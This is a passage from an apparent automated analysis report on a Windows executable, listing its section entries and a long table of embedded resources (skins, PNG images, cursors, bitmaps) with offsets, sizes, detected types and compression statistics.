                                                    .rdata0x11ab0000x5d0x200bbf834c5e1c2e8d68dc3b87c5bab071eFalse0.1953125data1.4440055777400933IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .reloc0x11ac0000x18c9980x18ca004c15d92165165211955327f402ab9fa8False0.4614231651827923data6.631496707978542IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                    .rsrc0x13390000x5e32000x5e32005cf8dbc3fa5d55c15bf8d54b904c3bfbunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                    DXNAVBARSKINS0x13483c80xd967data0.5110771718623663
                                                    DXNAVBARSKINS0x1355d300xdb8ddata0.5181567476203185
                                                    DXNAVBARSKINS0x13638c00xd8c4data0.5139839976933612
                                                    DXNAVBARSKINS0x13711840x8ee8data0.47974524382243605
                                                    DXSKINS0x137a06c0xb9aPNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0037037037037038
                                                    DXSKINS0x137ac080x349PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0130796670630202
                                                    DXSKINS0x137af540x529c5data0.6879715580143806
                                                    DXSKINS0x13cd91c0x4966cdata0.6809267857855594
                                                    DXSKINS0x1416f880xabf95data0.5955891851988557
                                                    MAD0x14c2f200x14data1.25
                                                    MAD0x14c2f340xe3914data1.0003121929030292
                                                    PNG0x15a68480x6d2PNG image data, 64 x 32, 8-bit/color RGBA, non-interlaced1.0063001145475372
                                                    PNG0x15a6f1c0x2d6PNG image data, 32 x 16, 8-bit/color RGBA, non-interlaced1.0151515151515151
                                                    PNG0x15a71f40x12aaPNG image data, 30 x 120, 8-bit/color RGBA, non-interlaced1.002302218501465
                                                    PNG0x15a84a00x3ccPNG image data, 20 x 40, 8-bit/color RGBA, non-interlaced1.0113168724279835
                                                    PNG0x15a886c0x336PC bitmap, Windows 3.x format, 16 x 16 x 24, resolution 3780 x 3780 px/m, cbSize 822, bits offset 540.08637469586374696
                                                    PNG0x15a8ba40x2436PC bitmap, Windows 3.x format, 48 x 48 x 32, image size 9216, cbSize 9270, bits offset 540.022222222222222223
                                                    PNG0x15aafdc0x336PC bitmap, Windows 3.x format, 16 x 16 x 24, resolution 3780 x 3780 px/m, cbSize 822, bits offset 540.3819951338199513
                                                    PNG0x15ab3140x2436PC bitmap, Windows 3.x format, 48 x 48 x 32, image size 9216, cbSize 9270, bits offset 540.0715210355987055
                                                    PNG0x15ad74c0x336PC bitmap, Windows 3.x format, 16 x 16 x 24, resolution 3780 x 3780 px/m, cbSize 822, bits offset 540.4720194647201946
                                                    PNG0x15ada840x2436PC bitmap, Windows 3.x format, 48 x 48 x 32, image size 9216, cbSize 9270, bits offset 540.15048543689320387
                                                    PNG0x15afebc0x436PC bitmap, Windows 3.x format, 16 x 16 x 32, image size 1024, cbSize 1078, bits offset 540.08719851576994433
                                                    PNG0x15b02f40x2436PC bitmap, Windows 3.x format, 48 x 48 x 32, image size 9216, cbSize 9270, bits offset 540.04703344120819849
                                                    PNG0x15b272c0x336PC bitmap, Windows 3.x format, 16 x 16 x 24, resolution 3780 x 3780 px/m, cbSize 822, bits offset 540.057177615571776155
                                                    PNG0x15b2a640x2436PC bitmap, Windows 3.x format, 48 x 48 x 32, image size 9216, cbSize 9270, bits offset 540.01790722761596548
                                                    PNG0x15b4e9c0x11ePNG image data, 12 x 12, 8-bit/color RGBA, non-interlaced0.9790209790209791
                                                    PNG0x15b4fbc0xc29PNG image data, 35 x 44, 8-bit/color RGBA, non-interlaced1.0035335689045937
                                                    UNICODEDATA0x15b5be80x723fdata0.36769583205115053
                                                    UNICODEDATA0x15bce280x7ebddata0.42552011095700415
                                                    UNICODEDATA0x15c4ce80x6a8data0.5985915492957746
                                                    UNICODEDATA0x15c53900xaf7ddata0.4191430161380078
                                                    UNICODEDATA0x15d03100xd3cfdata0.4500857569666009
                                                    UNICODEDATA0x15dd6e00x14c5data0.6482979123565921
                                                    RT_CURSOR0x15deba80x134dataEnglishUnited States0.43506493506493504
                                                    RT_CURSOR0x15decdc0x134dataEnglishUnited States0.4642857142857143
                                                    RT_CURSOR0x15dee100x134dataEnglishUnited States0.4805194805194805
                                                    RT_CURSOR0x15def440x134dataEnglishUnited States0.38311688311688313
                                                    RT_CURSOR0x15df0780x134dataEnglishUnited States0.36038961038961037
                                                    RT_CURSOR0x15df1ac0x134dataEnglishUnited States0.4090909090909091
                                                    RT_CURSOR0x15df2e00x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                    RT_CURSOR0x15df4140x2ecTarga image data 64 x 65536 x 1 +32 "\004"GermanGermany0.19385026737967914
                                                    RT_CURSOR0x15df7000x2ecTarga image data 64 x 65536 x 1 +32 "\004"GermanGermany0.18716577540106952
                                                    RT_CURSOR0x15df9ec0x2ecTarga image data 64 x 65536 x 1 +32 "\004"GermanGermany0.2179144385026738
                                                    RT_CURSOR0x15dfcd80x2ecTarga image data 64 x 65536 x 1 +32 "\004"GermanGermany0.21122994652406418
                                                    RT_CURSOR0x15dffc40x134AmigaOS bitmap font "(", fc_YSize 4294967064, 3584 elements, 2nd "\377\270w\377\377\370\177\377\377\370\177\377\377\370\177\377\377\370\177\377\377\370\177\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdGermanGermany0.32792207792207795
                                                    RT_CURSOR0x15e00f80x134Targa image data 64 x 65536 x 1 +32 "\001"0.38311688311688313
                                                    RT_CURSOR0x15e022c0x134Targa image data - RLE 64 x 65536 x 1 +32 "\001"0.4090909090909091
                                                    RT_CURSOR0x15e03600x134Targa image data - RLE 64 x 65536 x 1 +32 "\001"0.4090909090909091
                                                    RT_CURSOR0x15e04940x134Targa image data - Mono 64 x 65536 x 1 +32 "\001"0.40584415584415584
                                                    RT_CURSOR0x15e05c80x134Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001"0.5162337662337663
                                                    RT_CURSOR0x15e06fc0x10acdata0.23266166822867854
                                                    RT_CURSOR0x15e17a80x10acdata0.17268041237113402
                                                    RT_CURSOR0x15e28540x134Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001"0.35714285714285715
                                                    RT_CURSOR0x15e29880x12cdata0.48
                                                    RT_CURSOR0x15e2ab40x134Targa image data - Map 64 x 65536 x 1 +32 "\001"0.4642857142857143
                                                    RT_CURSOR0x15e2be80x2ecdata0.18449197860962566
                                                    RT_CURSOR0x15e2ed40x134data0.12012987012987013
                                                    RT_CURSOR0x15e30080x134data0.525974025974026
                                                    RT_CURSOR0x15e313c0x134data0.4675324675324675
                                                    RT_CURSOR0x15e32700x134data0.6168831168831169
                                                    RT_CURSOR0x15e33a40x134data0.4935064935064935
                                                    RT_CURSOR0x15e34d80x134data0.6103896103896104
                                                    RT_CURSOR0x15e360c0x134data0.4383116883116883
                                                    RT_CURSOR0x15e37400x134Targa image data - Mono - RLE 64 x 65536 x 1 +32 "\001"0.35714285714285715
                                                    RT_CURSOR0x15e38740x134data0.44155844155844154
                                                    RT_CURSOR0x15e39a80x134Targa image data 64 x 65536 x 1 +32 "\001"0.5746753246753247
                                                    RT_CURSOR0x15e3adc0x134Targa image data 64 x 65536 x 1 +32 "\001"0.275974025974026
                                                    RT_CURSOR0x15e3c100x134data0.37012987012987014
                                                    RT_CURSOR0x15e3d440x134data0.37012987012987014
                                                    RT_CURSOR0x15e3e780x134AmigaOS bitmap font "(", fc_YSize 4294966287, 3840 elements, 2nd "\376\017\340\377\377\017\341\377\377\217\343\377\377\337\367\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rd0.4642857142857143
                                                    RT_CURSOR0x15e3fac0x134Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001"0.32142857142857145
                                                    RT_CURSOR0x15e40e00x134data0.3409090909090909
                                                    RT_CURSOR0x15e42140x134Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001"0.4837662337662338
                                                    RT_CURSOR0x15e43480x134AmigaOS bitmap font "(", fc_YSize 4294935297, 3840 elements, 2nd "\200\003\377\201\300\007\377\203\300\017\377\003\340\037\376\007\360\037\370\017\370\003\300\037\374", 3rd0.711038961038961
                                                    RT_CURSOR0x15e447c0x134data0.6038961038961039
                                                    RT_CURSOR0x15e45b00x134Targa image data 64 x 65536 x 1 +32 "\001"0.36038961038961037
                                                    RT_CURSOR0x15e46e40x134Targa image data 64 x 65536 x 1 +32 "\001"0.3474025974025974
                                                    RT_CURSOR0x15e48180x134AmigaOS bitmap font "(", fc_YSize 4294967040, 3840 elements, 2nd "\376", 3rd0.4383116883116883
                                                    RT_CURSOR0x15e494c0x134Targa image data - RLE 64 x 65536 x 1 +32 "\001"0.35064935064935066
                                                    RT_CURSOR0x15e4a800x134Targa image data - Mono 64 x 65536 x 1 +32 "\001"0.4512987012987013
                                                    RT_CURSOR0x15e4bb40x134Targa image data - Mono 64 x 65536 x 1 +32 "\001"0.39285714285714285
                                                    RT_CURSOR0x15e4ce80x134Targa image data - Mono 64 x 65536 x 1 +32 "\001"0.4967532467532468
                                                    RT_CURSOR0x15e4e1c0x134Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001"0.32142857142857145
                                                    RT_CURSOR0x15e4f500xcacdata0.06781750924784218
                                                    RT_CURSOR0x15e5bfc0xcacdata0.06812577065351418
                                                    RT_CURSOR0x15e68a80xcacdata0.053329223181257705
                                                    RT_CURSOR0x15e75540xcacdata0.21393341553637485
                                                    RT_CURSOR0x15e82000xcacdata0.1374845869297164
                                                    RT_CURSOR0x15e8eac0x134data0.5162337662337663
                                                    RT_CURSOR0x15e8fe00x134data0.4577922077922078
                                                    RT_CURSOR0x15e91140x134data0.37337662337662336
                                                    RT_CURSOR0x15e92480x134Targa image data - RLE 64 x 65536 x 1 +32 "\001"0.32142857142857145
                                                    RT_CURSOR0x15e937c0x134Targa image data - RLE 64 x 65536 x 1 +32 "\001"0.35064935064935066
                                                    RT_CURSOR0x15e94b00x134Targa image data 64 x 65536 x 1 +32 "\001"0.5746753246753247
                                                    RT_CURSOR0x15e95e40x134AmigaOS bitmap font "(", fc_YSize 4294966287, 3840 elements, 2nd "\376\017\340\377\377\017\341\377\377\217\343\377\377\337\367\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rd0.4642857142857143
                                                    RT_CURSOR0x15e97180x134AmigaOS bitmap font "(", fc_YSize 4294967040, 3840 elements, 2nd "\376", 3rd0.4383116883116883
                                                    RT_CURSOR0x15e984c0x134Targa image data 64 x 65536 x 1 +32 "\001"0.4025974025974026
                                                    RT_CURSOR0x15e99800x134Targa image data 64 x 65536 x 1 +32 "\001"0.40584415584415584
                                                    RT_CURSOR0x15e9ab40x134Targa image data - Mono - RLE 64 x 65536 x 1 +32 "\001"0.39285714285714285
                                                    RT_CURSOR0x15e9be80x134data0.4090909090909091
                                                    RT_CURSOR0x15e9d1c0x134Targa image data 64 x 65536 x 1 +32 "\001"0.3961038961038961
                                                    RT_CURSOR0x15e9e500x134data0.4025974025974026
                                                    RT_CURSOR0x15e9f840x134data0.39935064935064934
                                                    RT_CURSOR0x15ea0b80x134Targa image data 64 x 65536 x 1 +32 "\001"0.3961038961038961
                                                    RT_CURSOR0x15ea1ec0x134Targa image data 64 x 65536 x 1 +32 "\001"0.31493506493506496
                                                    RT_CURSOR0x15ea3200x134data0.4383116883116883
                                                    RT_CURSOR0x15ea4540x134data0.37012987012987014
                                                    RT_CURSOR0x15ea5880x134data0.42207792207792205
                                                    RT_CURSOR0x15ea6bc0x134Targa image data - Mono 64 x 65536 x 1 +32 "\001"0.37012987012987014
                                                    RT_CURSOR0x15ea7f00x134dataEnglishUnited States0.38636363636363635
                                                    RT_CURSOR0x15ea9240x134Targa image data 64 x 65536 x 1 +32 "\001"GermanGermany0.5292207792207793
                                                    RT_CURSOR0x15eaa580x2ecTarga image data 64 x 65536 x 1 +32 "\004"GermanGermany0.18983957219251338
                                                    RT_CURSOR0x15ead440x2ecTarga image data 64 x 65536 x 1 +32 "\004"GermanGermany0.19117647058823528
                                                    RT_CURSOR0x15eb0300x2ecTarga image data 64 x 65536 x 1 +32 "\004"GermanGermany0.19786096256684493
                                                    RT_CURSOR0x15eb31c0x2ecTarga image data 64 x 65536 x 1 +32 "\004"GermanGermany0.18983957219251338
                                                    RT_CURSOR0x15eb6080x2ecTarga image data 64 x 65536 x 1 +32 "\004"GermanGermany0.19518716577540107
                                                    RT_CURSOR0x15eb8f40x2ecTarga image data 64 x 65536 x 1 +32 "\004"GermanGermany0.19518716577540107
                                                    RT_CURSOR0x15ebbe00x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                    RT_BITMAP0x15ebd140x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                    RT_BITMAP0x15ebee40x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 380EnglishUnited States0.46487603305785125
                                                    RT_BITMAP0x15ec0c80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                    RT_BITMAP0x15ec2980x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39870689655172414
                                                    RT_BITMAP0x15ec4680x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.4245689655172414
                                                    RT_BITMAP0x15ec6380x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5021551724137931
                                                    RT_BITMAP0x15ec8080x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5064655172413793
                                                    RT_BITMAP0x15ec9d80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                    RT_BITMAP0x15ecba80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5344827586206896
                                                    RT_BITMAP0x15ecd780x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                    RT_BITMAP0x15ecf480xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.5208333333333334
                                                    RT_BITMAP0x15ed0080xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.42857142857142855
                                                    RT_BITMAP0x15ed0e80x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.39864864864864863
                                                    RT_BITMAP0x15ed2100x128Device independent bitmap graphic, 19 x 16 x 4, image size 192EnglishUnited States0.3885135135135135
                                                    RT_BITMAP0x15ed3380x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.3885135135135135
                                                    RT_BITMAP0x15ed4600xe8Device independent bitmap graphic, 13 x 16 x 4, image size 128EnglishUnited States0.36637931034482757
                                                    RT_BITMAP0x15ed5480x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.3614864864864865
                                                    RT_BITMAP0x15ed6700x128Device independent bitmap graphic, 20 x 16 x 4, image size 192EnglishUnited States0.3783783783783784
                                                    RT_BITMAP0x15ed7980xd0Device independent bitmap graphic, 13 x 13 x 4, image size 104EnglishUnited States0.49038461538461536
                                                    RT_BITMAP0x15ed8680x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.3716216216216216
                                                    RT_BITMAP0x15ed9900x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.2905405405405405
                                                    RT_BITMAP0x15edab80xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.4955357142857143
                                                    RT_BITMAP0x15edb980x298Device independent bitmap graphic, 16 x 13 x 24, image size 6240.733433734939759
                                                    RT_BITMAP0x15ede300x298Device independent bitmap graphic, 16 x 13 x 24, image size 6240.5015060240963856
                                                    RT_BITMAP0x15ee0c80x298Device independent bitmap graphic, 16 x 13 x 24, image size 6240.766566265060241
                                                    RT_BITMAP0x15ee3600x298Device independent bitmap graphic, 16 x 13 x 24, image size 6240.5015060240963856
                                                    RT_BITMAP0x15ee5f80x298Device independent bitmap graphic, 16 x 13 x 24, image size 6240.7319277108433735
                                                    RT_BITMAP0x15ee8900x298Device independent bitmap graphic, 16 x 13 x 24, image size 6240.5225903614457831
                                                    RT_BITMAP0x15eeb280x298Device independent bitmap graphic, 16 x 13 x 24, image size 6240.5180722891566265
                                                    RT_BITMAP0x15eedc00x298Device independent bitmap graphic, 16 x 13 x 24, image size 6240.338855421686747
                                                    RT_BITMAP0x15ef0580x268Device independent bitmap graphic, 12 x 12 x 32, image size 5760.7532467532467533
                                                    RT_BITMAP0x15ef2c00x268Device independent bitmap graphic, 12 x 12 x 32, image size 5760.7954545454545454
                                                    RT_BITMAP0x15ef5280x268Device independent bitmap graphic, 12 x 12 x 32, image size 5760.7191558441558441
                                                    RT_BITMAP0x15ef7900xc28Device independent bitmap graphic, 32 x 32 x 24, image size 30720.5067480719794345
                                                    RT_BITMAP0x15f03b80xc28Device independent bitmap graphic, 32 x 32 x 24, image size 30720.36568123393316193
                                                    RT_BITMAP0x15f0fe00xc28Device independent bitmap graphic, 32 x 32 x 24, image size 30720.3968508997429306
                                                    RT_BITMAP0x15f1c080xc28Device independent bitmap graphic, 32 x 32 x 24, image size 30720.419987146529563
                                                    RT_BITMAP0x15f28300xc28Device independent bitmap graphic, 32 x 32 x 24, image size 30720.6233933161953727
                                                    RT_BITMAP0x15f34580xc28Device independent bitmap graphic, 32 x 32 x 24, image size 30720.5678020565552699
                                                    RT_BITMAP0x15f40800xc28Device independent bitmap graphic, 32 x 32 x 24, image size 30720.38753213367609257
                                                    RT_BITMAP0x15f4ca80xc28Device independent bitmap graphic, 32 x 32 x 24, image size 30720.4142030848329049
                                                    RT_BITMAP0x15f58d00x4acDevice independent bitmap graphic, 11 x 11 x 8, image size 132, 256 important colors0.5058528428093646
                                                    RT_BITMAP0x15f5d7c0x328Device independent bitmap graphic, 16 x 16 x 24, image size 7680.5495049504950495
                                                    RT_BITMAP0x15f60a40x328Device independent bitmap graphic, 16 x 16 x 24, image size 7680.32673267326732675
                                                    RT_BITMAP0x15f63cc0x328Device independent bitmap graphic, 16 x 16 x 24, image size 7680.12747524752475248
                                                    RT_BITMAP0x15f66f40x328Device independent bitmap graphic, 16 x 16 x 24, image size 7680.5804455445544554
                                                    RT_BITMAP0x15f6a1c0x328Device independent bitmap graphic, 16 x 16 x 24, image size 7680.6423267326732673
                                                    RT_BITMAP0x15f6d440x328Device independent bitmap graphic, 16 x 16 x 24, image size 7680.6349009900990099
                                                    RT_BITMAP0x15f706c0x1f70Device independent bitmap graphic, 242 x 11 x 24, image size 80080.16153081510934394
                                                    RT_BITMAP0x15f8fdc0x8cDevice independent bitmap graphic, 8 x 9 x 4, image size 360.4714285714285714
                                                    RT_BITMAP0x15f90680x8cDevice independent bitmap graphic, 8 x 9 x 4, image size 360.45
                                                    RT_BITMAP0x15f90f40x8cDevice independent bitmap graphic, 8 x 9 x 4, image size 360.5071428571428571
                                                    RT_BITMAP0x15f91800x238Device independent bitmap graphic, 29 x 29 x 4, image size 4640.25
                                                    RT_BITMAP0x15f93b80x238Device independent bitmap graphic, 29 x 29 x 4, image size 4640.20950704225352113
                                                    RT_BITMAP0x15f95f00x8cDevice independent bitmap graphic, 8 x 9 x 4, image size 360.4928571428571429
                                                    RT_BITMAP0x15f967c0x8cDevice independent bitmap graphic, 8 x 9 x 4, image size 360.5
                                                    RT_BITMAP0x15f97080x8cDevice independent bitmap graphic, 8 x 9 x 4, image size 360.4785714285714286
                                                    RT_BITMAP0x15f97940xd4cDevice independent bitmap graphic, 29 x 29 x 32, image size 33640.029083431257344302
                                                    RT_BITMAP0x15fa4e00xd4cDevice independent bitmap graphic, 29 x 29 x 32, image size 33640.02673325499412456
                                                    RT_BITMAP0x15fb22c0xd4cDevice independent bitmap graphic, 29 x 29 x 32, image size 33640.43537015276145713
                                                    RT_BITMAP0x15fbf780xd4cDevice independent bitmap graphic, 29 x 29 x 32, image size 33640.030258519388954172
                                                    RT_BITMAP0x15fccc40x8cDevice independent bitmap graphic, 8 x 9 x 4, image size 36, 16 important colors0.5285714285714286
                                                    RT_BITMAP0x15fcd500x238Device independent bitmap graphic, 29 x 29 x 4, image size 4640.21654929577464788
                                                    RT_BITMAP0x15fcf880x268Device independent bitmap graphic, 12 x 12 x 32, image size 5760.1590909090909091
                                                    RT_BITMAP0x15fd1f00x268Device independent bitmap graphic, 12 x 12 x 32, image size 5760.11688311688311688
                                                    RT_BITMAP0x15fd4580x46eDevice independent bitmap graphic, 28 x 13 x 24, image size 1094, resolution 2834 x 2834 px/mEnglishUnited States0.328042328042328
                                                    RT_BITMAP0x15fd8c80x46eDevice independent bitmap graphic, 28 x 13 x 24, image size 1094, resolution 2834 x 2834 px/mEnglishUnited States0.3289241622574956
                                                    RT_BITMAP0x15fdd380x46eDevice independent bitmap graphic, 28 x 13 x 24, image size 1094, resolution 2834 x 2834 px/mEnglishUnited States0.40476190476190477
                                                    RT_BITMAP0x15fe1a80x46eDevice independent bitmap graphic, 28 x 13 x 24, image size 1094, resolution 2834 x 2834 px/mEnglishUnited States0.09435626102292768
                                                    RT_BITMAP0x15fe6180x46eDevice independent bitmap graphic, 28 x 13 x 24, image size 1094, resolution 2834 x 2834 px/mEnglishUnited States0.23721340388007053
                                                    RT_BITMAP0x15fea880x46eDevice independent bitmap graphic, 28 x 13 x 24, image size 1094, resolution 2834 x 2834 px/mEnglishUnited States0.29188712522045857
                                                    RT_BITMAP0x15feef80x46eDevice independent bitmap graphic, 28 x 13 x 24, image size 1094, resolution 2834 x 2834 px/mEnglishUnited States0.1675485008818342
                                                    RT_BITMAP0x15ff3680x46eDevice independent bitmap graphic, 28 x 13 x 24, image size 1094, resolution 2834 x 2834 px/mEnglishUnited States0.2892416225749559
                                                    RT_BITMAP0x15ff7d80x46eDevice independent bitmap graphic, 28 x 13 x 24, image size 1094, resolution 2834 x 2834 px/mEnglishUnited States0.2751322751322751
                                                    RT_BITMAP0x15ffc480x46eDevice independent bitmap graphic, 28 x 13 x 24, image size 1094, resolution 2834 x 2834 px/mEnglishUnited States0.30776014109347444
                                                    RT_BITMAP0x16000b80x46eDevice independent bitmap graphic, 28 x 13 x 24, image size 1094, resolution 2834 x 2834 px/mEnglishUnited States0.2777777777777778
                                                    RT_BITMAP0x16005280x46eDevice independent bitmap graphic, 28 x 13 x 24, image size 1094, resolution 2834 x 2834 px/mEnglishUnited States0.41887125220458554
                                                    RT_BITMAP0x16009980x50Device independent bitmap graphic, 8 x 8 x 1, image size 32PolishPoland0.4125
                                                    RT_BITMAP0x16009e80x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.38175675675675674
                                                    RT_BITMAP0x1600b100x128Device independent bitmap graphic, 19 x 16 x 4, image size 192EnglishUnited States0.3783783783783784
                                                    RT_BITMAP0x1600c380x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.3783783783783784
                                                    RT_BITMAP0x1600d600xe8Device independent bitmap graphic, 12 x 16 x 4, image size 128EnglishUnited States0.3620689655172414
                                                    RT_BITMAP0x1600e480x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.3581081081081081
                                                    RT_BITMAP0x1600f700x128Device independent bitmap graphic, 20 x 16 x 4, image size 192EnglishUnited States0.36486486486486486
                                                    RT_BITMAP0x16010980xd0Device independent bitmap graphic, 13 x 13 x 4, image size 104EnglishUnited States0.47115384615384615
                                                    RT_BITMAP0x16011680x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.36824324324324326
                                                    RT_BITMAP0x16012900x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.28716216216216217
                                                    RT_BITMAP0x16013b80xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.3232758620689655
                                                    RT_BITMAP0x16014a00x528Device independent bitmap graphic, 16 x 16 x 8, image size 2560.42272727272727273
                                                    RT_BITMAP0x16019c80xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.45689655172413796
                                                    RT_BITMAP0x1601ab00xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.4482758620689655
                                                    RT_BITMAP0x1601b980xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.5258620689655172
                                                    RT_BITMAP0x1601c800xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.28448275862068967
                                                    RT_BITMAP0x1601d680xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.2629310344827586
                                                    RT_BITMAP0x1601e500xd0Device independent bitmap graphic, 13 x 13 x 4, image size 1040.46153846153846156
                                                    RT_BITMAP0x1601f200xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.33189655172413796
                                                    RT_BITMAP0x16020080xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.3620689655172414
                                                    RT_BITMAP0x16020f00xd0Device independent bitmap graphic, 13 x 13 x 4, image size 1040.47596153846153844
                                                    RT_BITMAP0x16021c00x4acDevice independent bitmap graphic, 11 x 11 x 8, image size 1320.4498327759197324
                                                    RT_BITMAP0x160266c0x4acDevice independent bitmap graphic, 11 x 11 x 8, image size 1320.459866220735786
                                                    RT_BITMAP0x1602b180x638Device independent bitmap graphic, 22 x 22 x 8, image size 5280.49685929648241206
                                                    RT_BITMAP0x16031500x638Device independent bitmap graphic, 22 x 22 x 8, image size 5280.48743718592964824
                                                    RT_BITMAP0x16037880x528Device independent bitmap graphic, 16 x 16 x 8, image size 2560.5295454545454545
                                                    RT_BITMAP0x1603cb00x528Device independent bitmap graphic, 16 x 16 x 8, image size 2560.5265151515151515
                                                    RT_BITMAP0x16041d80x528Device independent bitmap graphic, 16 x 16 x 8, image size 2560.40606060606060607
                                                    RT_BITMAP0x16047000x528Device independent bitmap graphic, 16 x 16 x 8, image size 2560.4075757575757576
                                                    RT_BITMAP0x1604c280x828Device independent bitmap graphic, 32 x 32 x 8, image size 10240.34770114942528735
                                                    RT_BITMAP0x16054500x528Device independent bitmap graphic, 16 x 16 x 8, image size 2560.4659090909090909
                                                    RT_BITMAP0x16059780x538Device independent bitmap graphic, 13 x 17 x 8, image size 2720.3967065868263473
                                                    RT_BITMAP0x1605eb00x4f0Device independent bitmap graphic, 37 x 5 x 8, image size 2000.39319620253164556
                                                    RT_BITMAP0x16063a00xc8Device independent bitmap graphic, 17 x 8 x 4, image size 960.445
                                                    RT_BITMAP0x16064680xc8Device independent bitmap graphic, 17 x 8 x 4, image size 960.44
                                                    RT_BITMAP0x16065300xc8Device independent bitmap graphic, 17 x 8 x 4, image size 960.445
                                                    RT_BITMAP0x16065f80xc8Device independent bitmap graphic, 17 x 8 x 4, image size 960.445
                                                    RT_BITMAP0x16066c00xc8Device independent bitmap graphic, 17 x 8 x 4, image size 960.445
                                                    RT_BITMAP0x16067880xc8Device independent bitmap graphic, 17 x 8 x 4, image size 960.435
                                                    RT_BITMAP0x16068500xc8Device independent bitmap graphic, 17 x 8 x 4, image size 960.445
                                                    RT_BITMAP0x16069180x528Device independent bitmap graphic, 16 x 16 x 8, image size 2560.5280303030303031
                                                    RT_BITMAP0x1606e400x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.3885135135135135
                                                    RT_BITMAP0x1606f680x128Device independent bitmap graphic, 19 x 16 x 4, image size 192EnglishUnited States0.375
                                                    RT_BITMAP0x16070900x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.375
                                                    RT_BITMAP0x16071b80xe8Device independent bitmap graphic, 13 x 16 x 4, image size 128EnglishUnited States0.36637931034482757
                                                    RT_BITMAP0x16072a00x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.35135135135135137
                                                    RT_BITMAP0x16073c80x128Device independent bitmap graphic, 20 x 16 x 4, image size 192EnglishUnited States0.36486486486486486
                                                    RT_BITMAP0x16074f00xd0Device independent bitmap graphic, 13 x 13 x 4, image size 104EnglishUnited States0.47115384615384615
                                                    RT_BITMAP0x16075c00x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.3581081081081081
                                                    RT_BITMAP0x16076e80x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.28716216216216217
                                                    RT_BITMAP0x16078100xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.38392857142857145
                                                    RT_BITMAP0x16078f00xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.4947916666666667
                                                    RT_BITMAP0x16079b00x328Device independent bitmap graphic, 16 x 16 x 24, image size 768, resolution 3780 x 3780 px/m0.11757425742574257
                                                    RT_BITMAP0x1607cd80xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.484375
                                                    RT_BITMAP0x1607d980x1028Device independent bitmap graphic, 64 x 48 x 8, image size 3072, 256 important colors0.11073500967117988
                                                    RT_BITMAP0x1608dc00x18428Device independent bitmap graphic, 256 x 384 x 8, image size 983040.5053739634489977
                                                    RT_BITMAP0x16211e80x10528Device independent bitmap graphic, 192 x 116 x 24, image size 668160.3392066531051813
                                                    RT_BITMAP0x16317100x69a0Device independent bitmap graphic, 300 x 30 x 24, image size 270000.42303994082840235
                                                    RT_BITMAP0x16380b00x428Device independent bitmap graphic, 16 x 16 x 32, image size 10240.41353383458646614
